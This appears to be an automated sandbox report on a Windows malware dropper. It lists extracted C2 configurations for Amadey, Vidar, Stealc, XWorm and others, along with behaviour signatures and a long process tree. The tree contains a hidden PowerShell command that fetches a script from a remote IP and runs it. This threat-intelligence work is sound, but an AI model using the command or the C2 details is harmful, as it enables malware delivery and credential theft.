Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 22:28

General

  • Target

    d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe

  • Size

    1.8MB

  • MD5

    4cf553af549bd99fa44da57de08620a8

  • SHA1

    67e04f4434f0a63b082b0c8f148f5c100a77e27f

  • SHA256

    d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e

  • SHA512

    4ac6fae3a8aeda3a8a0e01d0e59385f674b72ccea57586b007a1a65e810c4063f2ea85a62f002b9fe522c2a986ae7faf2e0f3f5cb5cc5ccbd2a58851df7b2186

  • SSDEEP

    49152:ZiUR7v8FfVoczMDeTHzkfyR2XKusikeZspsfHz:Z9ZvCtCD2QfC4hsikBpGH

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86

Attributes
  • dns

    5.132.191.104

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:6969

Mutex

uGmGtmYAbzOi1F41

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 6 IoCs
  • Detect Xworm Payload 4 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 16 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 63 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 64 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe
    "C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2668
      • C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
        "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2876
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1504
      • C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
        "C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Users\Admin\AppData\Local\Temp\dll32.exe
          "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2300
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat
            5⤵
              PID:1672
              • C:\Windows\system32\chcp.com
                chcp 65001
                6⤵
                  PID:2472
                • C:\Windows\system32\tasklist.exe
                  Tasklist /fi "PID eq 2300"
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1700
                • C:\Windows\system32\find.exe
                  find ":"
                  6⤵
                    PID:1968
                  • C:\Windows\system32\timeout.exe
                    Timeout /T 1 /Nobreak
                    6⤵
                    • Delays execution with timeout.exe
                    PID:1256
                  • C:\Windows\system32\tasklist.exe
                    Tasklist /fi "PID eq 2300"
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3052
                  • C:\Windows\system32\find.exe
                    find ":"
                    6⤵
                      PID:1764
                    • C:\Windows\system32\timeout.exe
                      Timeout /T 1 /Nobreak
                      6⤵
                      • Delays execution with timeout.exe
                      PID:2636
                    • C:\Windows\system32\tasklist.exe
                      Tasklist /fi "PID eq 2300"
                      6⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:920
                    • C:\Windows\system32\find.exe
                      find ":"
                      6⤵
                        PID:2504
                      • C:\Windows\system32\timeout.exe
                        Timeout /T 1 /Nobreak
                        6⤵
                        • Delays execution with timeout.exe
                        PID:296
                      • C:\Windows\system32\tasklist.exe
                        Tasklist /fi "PID eq 2300"
                        6⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:908
                      • C:\Windows\system32\find.exe
                        find ":"
                        6⤵
                          PID:1732
                        • C:\Windows\system32\timeout.exe
                          Timeout /T 1 /Nobreak
                          6⤵
                          • Delays execution with timeout.exe
                          PID:2828
                        • C:\Windows\system32\tasklist.exe
                          Tasklist /fi "PID eq 2300"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2080
                        • C:\Windows\system32\find.exe
                          find ":"
                          6⤵
                            PID:2664
                          • C:\Windows\system32\timeout.exe
                            Timeout /T 1 /Nobreak
                            6⤵
                            • Delays execution with timeout.exe
                            PID:2872
                          • C:\Windows\system32\tasklist.exe
                            Tasklist /fi "PID eq 2300"
                            6⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1044
                          • C:\Windows\system32\find.exe
                            find ":"
                            6⤵
                              PID:876
                            • C:\Windows\system32\timeout.exe
                              Timeout /T 1 /Nobreak
                              6⤵
                              • Delays execution with timeout.exe
                              PID:1676
                            • C:\Windows\system32\tasklist.exe
                              Tasklist /fi "PID eq 2300"
                              6⤵
                              • Enumerates processes with tasklist
                              PID:2004
                            • C:\Windows\system32\find.exe
                              find ":"
                              6⤵
                                PID:1556
                              • C:\Windows\system32\timeout.exe
                                Timeout /T 1 /Nobreak
                                6⤵
                                • Delays execution with timeout.exe
                                PID:1268
                              • C:\Windows\system32\tasklist.exe
                                Tasklist /fi "PID eq 2300"
                                6⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2796
                              • C:\Windows\system32\find.exe
                                find ":"
                                6⤵
                                  PID:2580
                                • C:\Windows\system32\timeout.exe
                                  Timeout /T 1 /Nobreak
                                  6⤵
                                  • Delays execution with timeout.exe
                                  PID:2768
                                • C:\Windows\system32\tasklist.exe
                                  Tasklist /fi "PID eq 2300"
                                  6⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2840
                                • C:\Windows\system32\find.exe
                                  find ":"
                                  6⤵
                                    PID:1920
                                  • C:\Windows\system32\timeout.exe
                                    Timeout /T 1 /Nobreak
                                    6⤵
                                    • Delays execution with timeout.exe
                                    PID:592
                                  • C:\Windows\system32\tasklist.exe
                                    Tasklist /fi "PID eq 2300"
                                    6⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3028
                                  • C:\Windows\system32\find.exe
                                    find ":"
                                    6⤵
                                      PID:2256
                                    • C:\Windows\system32\timeout.exe
                                      Timeout /T 1 /Nobreak
                                      6⤵
                                      • Delays execution with timeout.exe
                                      PID:880
                                    • C:\Windows\system32\tasklist.exe
                                      Tasklist /fi "PID eq 2300"
                                      6⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1288
                                    • C:\Windows\system32\find.exe
                                      find ":"
                                      6⤵
                                        PID:848
                                      • C:\Windows\system32\timeout.exe
                                        Timeout /T 1 /Nobreak
                                        6⤵
                                        • Delays execution with timeout.exe
                                        PID:2200
                                      • C:\Windows\system32\tasklist.exe
                                        Tasklist /fi "PID eq 2300"
                                        6⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2380
                                      • C:\Windows\system32\find.exe
                                        find ":"
                                        6⤵
                                          PID:624
                                        • C:\Windows\system32\timeout.exe
                                          Timeout /T 1 /Nobreak
                                          6⤵
                                            PID:2896
                                          • C:\Windows\system32\tasklist.exe
                                            Tasklist /fi "PID eq 2300"
                                            6⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1848
                                          • C:\Windows\system32\find.exe
                                            find ":"
                                            6⤵
                                              PID:944
                                            • C:\Windows\system32\timeout.exe
                                              Timeout /T 1 /Nobreak
                                              6⤵
                                              • Delays execution with timeout.exe
                                              PID:1980
                                            • C:\Windows\system32\tasklist.exe
                                              Tasklist /fi "PID eq 2300"
                                              6⤵
                                              • Enumerates processes with tasklist
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2760
                                            • C:\Windows\system32\find.exe
                                              find ":"
                                              6⤵
                                                PID:1040
                                              • C:\Windows\system32\timeout.exe
                                                Timeout /T 1 /Nobreak
                                                6⤵
                                                • Delays execution with timeout.exe
                                                PID:2560
                                              • C:\Windows\system32\tasklist.exe
                                                Tasklist /fi "PID eq 2300"
                                                6⤵
                                                • Enumerates processes with tasklist
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2568
                                              • C:\Windows\system32\find.exe
                                                find ":"
                                                6⤵
                                                  PID:2836
                                                • C:\Windows\system32\timeout.exe
                                                  Timeout /T 1 /Nobreak
                                                  6⤵
                                                  • Delays execution with timeout.exe
                                                  PID:2440
                                                • C:\Windows\system32\tasklist.exe
                                                  Tasklist /fi "PID eq 2300"
                                                  6⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2140
                                                • C:\Windows\system32\find.exe
                                                  find ":"
                                                  6⤵
                                                    PID:2840
                                                  • C:\Windows\system32\timeout.exe
                                                    Timeout /T 1 /Nobreak
                                                    6⤵
                                                      PID:2180
                                                    • C:\Windows\system32\tasklist.exe
                                                      Tasklist /fi "PID eq 2300"
                                                      6⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2616
                                                    • C:\Windows\system32\find.exe
                                                      find ":"
                                                      6⤵
                                                        PID:2916
                                                      • C:\Windows\system32\timeout.exe
                                                        Timeout /T 1 /Nobreak
                                                        6⤵
                                                        • Delays execution with timeout.exe
                                                        PID:2176
                                                      • C:\Windows\system32\tasklist.exe
                                                        Tasklist /fi "PID eq 2300"
                                                        6⤵
                                                        • Enumerates processes with tasklist
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2136
                                                      • C:\Windows\system32\find.exe
                                                        find ":"
                                                        6⤵
                                                          PID:2144
                                                        • C:\Windows\system32\timeout.exe
                                                          Timeout /T 1 /Nobreak
                                                          6⤵
                                                            PID:2860
                                                          • C:\Windows\system32\tasklist.exe
                                                            Tasklist /fi "PID eq 2300"
                                                            6⤵
                                                            • Enumerates processes with tasklist
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1144
                                                          • C:\Windows\system32\find.exe
                                                            find ":"
                                                            6⤵
                                                              PID:484
                                                            • C:\Windows\system32\timeout.exe
                                                              Timeout /T 1 /Nobreak
                                                              6⤵
                                                                PID:2124
                                                              • C:\Windows\system32\tasklist.exe
                                                                Tasklist /fi "PID eq 2300"
                                                                6⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1296
                                                              • C:\Windows\system32\find.exe
                                                                find ":"
                                                                6⤵
                                                                  PID:3028
                                                                • C:\Windows\system32\timeout.exe
                                                                  Timeout /T 1 /Nobreak
                                                                  6⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:2456
                                                                • C:\Windows\system32\tasklist.exe
                                                                  Tasklist /fi "PID eq 2300"
                                                                  6⤵
                                                                  • Enumerates processes with tasklist
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2940
                                                                • C:\Windows\system32\find.exe
                                                                  find ":"
                                                                  6⤵
                                                                    PID:1532
                                                                  • C:\Windows\system32\timeout.exe
                                                                    Timeout /T 1 /Nobreak
                                                                    6⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:2248
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    Tasklist /fi "PID eq 2300"
                                                                    6⤵
                                                                    • Enumerates processes with tasklist
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2284
                                                                  • C:\Windows\system32\find.exe
                                                                    find ":"
                                                                    6⤵
                                                                      PID:1600
                                                                    • C:\Windows\system32\timeout.exe
                                                                      Timeout /T 1 /Nobreak
                                                                      6⤵
                                                                        PID:3064
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        Tasklist /fi "PID eq 2300"
                                                                        6⤵
                                                                        • Enumerates processes with tasklist
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2400
                                                                      • C:\Windows\system32\find.exe
                                                                        find ":"
                                                                        6⤵
                                                                          PID:2520
                                                                        • C:\Windows\system32\timeout.exe
                                                                          Timeout /T 1 /Nobreak
                                                                          6⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:2016
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          Tasklist /fi "PID eq 2300"
                                                                          6⤵
                                                                          • Enumerates processes with tasklist
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2920
                                                                        • C:\Windows\system32\find.exe
                                                                          find ":"
                                                                          6⤵
                                                                            PID:916
                                                                          • C:\Windows\system32\timeout.exe
                                                                            Timeout /T 1 /Nobreak
                                                                            6⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:296
                                                                          • C:\Windows\system32\tasklist.exe
                                                                            Tasklist /fi "PID eq 2300"
                                                                            6⤵
                                                                            • Enumerates processes with tasklist
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1736
                                                                          • C:\Windows\system32\find.exe
                                                                            find ":"
                                                                            6⤵
                                                                              PID:2476
                                                                            • C:\Windows\system32\timeout.exe
                                                                              Timeout /T 1 /Nobreak
                                                                              6⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:2828
                                                                            • C:\Windows\system32\tasklist.exe
                                                                              Tasklist /fi "PID eq 2300"
                                                                              6⤵
                                                                              • Enumerates processes with tasklist
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2700
                                                                            • C:\Windows\system32\find.exe
                                                                              find ":"
                                                                              6⤵
                                                                                PID:2792
                                                                              • C:\Windows\system32\timeout.exe
                                                                                Timeout /T 1 /Nobreak
                                                                                6⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:1700
                                                                              • C:\Windows\system32\tasklist.exe
                                                                                Tasklist /fi "PID eq 2300"
                                                                                6⤵
                                                                                • Enumerates processes with tasklist
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2864
                                                                              • C:\Windows\system32\find.exe
                                                                                find ":"
                                                                                6⤵
                                                                                  PID:2664
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  Timeout /T 1 /Nobreak
                                                                                  6⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:1572
                                                                                • C:\Windows\system32\tasklist.exe
                                                                                  Tasklist /fi "PID eq 2300"
                                                                                  6⤵
                                                                                  • Enumerates processes with tasklist
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2836
                                                                                • C:\Windows\system32\find.exe
                                                                                  find ":"
                                                                                  6⤵
                                                                                    PID:2716
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    Timeout /T 1 /Nobreak
                                                                                    6⤵
                                                                                      PID:2684
                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                      Tasklist /fi "PID eq 2300"
                                                                                      6⤵
                                                                                      • Enumerates processes with tasklist
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1748
                                                                                    • C:\Windows\system32\find.exe
                                                                                      find ":"
                                                                                      6⤵
                                                                                        PID:332
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        Timeout /T 1 /Nobreak
                                                                                        6⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:1908
                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                        Tasklist /fi "PID eq 2300"
                                                                                        6⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2856
                                                                                      • C:\Windows\system32\find.exe
                                                                                        find ":"
                                                                                        6⤵
                                                                                          PID:2188
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          Timeout /T 1 /Nobreak
                                                                                          6⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:2460
                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                          Tasklist /fi "PID eq 2300"
                                                                                          6⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2924
                                                                                        • C:\Windows\system32\find.exe
                                                                                          find ":"
                                                                                          6⤵
                                                                                            PID:1144
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            Timeout /T 1 /Nobreak
                                                                                            6⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:2152
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            Tasklist /fi "PID eq 2300"
                                                                                            6⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1296
                                                                                          • C:\Windows\system32\find.exe
                                                                                            find ":"
                                                                                            6⤵
                                                                                              PID:3028
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              Timeout /T 1 /Nobreak
                                                                                              6⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:1288
                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                              Tasklist /fi "PID eq 2300"
                                                                                              6⤵
                                                                                              • Enumerates processes with tasklist
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1316
                                                                                            • C:\Windows\system32\find.exe
                                                                                              find ":"
                                                                                              6⤵
                                                                                                PID:2172
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                Timeout /T 1 /Nobreak
                                                                                                6⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:2996
                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                Tasklist /fi "PID eq 2300"
                                                                                                6⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2436
                                                                                              • C:\Windows\system32\find.exe
                                                                                                find ":"
                                                                                                6⤵
                                                                                                  PID:828
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  Timeout /T 1 /Nobreak
                                                                                                  6⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:2292
                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                  Tasklist /fi "PID eq 2300"
                                                                                                  6⤵
                                                                                                  • Enumerates processes with tasklist
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3016
                                                                                                • C:\Windows\system32\find.exe
                                                                                                  find ":"
                                                                                                  6⤵
                                                                                                    PID:1044
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    Timeout /T 1 /Nobreak
                                                                                                    6⤵
                                                                                                      PID:1584
                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                      Tasklist /fi "PID eq 2300"
                                                                                                      6⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:556
                                                                                                    • C:\Windows\system32\find.exe
                                                                                                      find ":"
                                                                                                      6⤵
                                                                                                        PID:2892
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        Timeout /T 1 /Nobreak
                                                                                                        6⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:2360
                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                        Tasklist /fi "PID eq 2300"
                                                                                                        6⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2728
                                                                                                      • C:\Windows\system32\find.exe
                                                                                                        find ":"
                                                                                                        6⤵
                                                                                                          PID:2664
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          Timeout /T 1 /Nobreak
                                                                                                          6⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:2560
                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                          Tasklist /fi "PID eq 2300"
                                                                                                          6⤵
                                                                                                          • Enumerates processes with tasklist
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:304
                                                                                                        • C:\Windows\system32\find.exe
                                                                                                          find ":"
                                                                                                          6⤵
                                                                                                            PID:2684
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            Timeout /T 1 /Nobreak
                                                                                                            6⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:300
                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                            Tasklist /fi "PID eq 2300"
                                                                                                            6⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2144
                                                                                                          • C:\Windows\system32\find.exe
                                                                                                            find ":"
                                                                                                            6⤵
                                                                                                              PID:3060
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              Timeout /T 1 /Nobreak
                                                                                                              6⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:840
                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                              Tasklist /fi "PID eq 2300"
                                                                                                              6⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1480
                                                                                                            • C:\Windows\system32\find.exe
                                                                                                              find ":"
                                                                                                              6⤵
                                                                                                                PID:2320
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                Timeout /T 1 /Nobreak
                                                                                                                6⤵
                                                                                                                  PID:2964
                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                  Tasklist /fi "PID eq 2300"
                                                                                                                  6⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:748
                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                  find ":"
                                                                                                                  6⤵
                                                                                                                    PID:2064
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    Timeout /T 1 /Nobreak
                                                                                                                    6⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:1536
                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                    Tasklist /fi "PID eq 2300"
                                                                                                                    6⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1300
                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                    find ":"
                                                                                                                    6⤵
                                                                                                                      PID:1656
                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                      Timeout /T 1 /Nobreak
                                                                                                                      6⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:1048
                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                      Tasklist /fi "PID eq 2300"
                                                                                                                      6⤵
                                                                                                                      • Enumerates processes with tasklist
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1236
                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                      find ":"
                                                                                                                      6⤵
                                                                                                                        PID:2000
                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                        Timeout /T 1 /Nobreak
                                                                                                                        6⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:1788
                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                        Tasklist /fi "PID eq 2300"
                                                                                                                        6⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:940
                                                                                                                      • C:\Windows\system32\find.exe
                                                                                                                        find ":"
                                                                                                                        6⤵
                                                                                                                          PID:1336
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          Timeout /T 1 /Nobreak
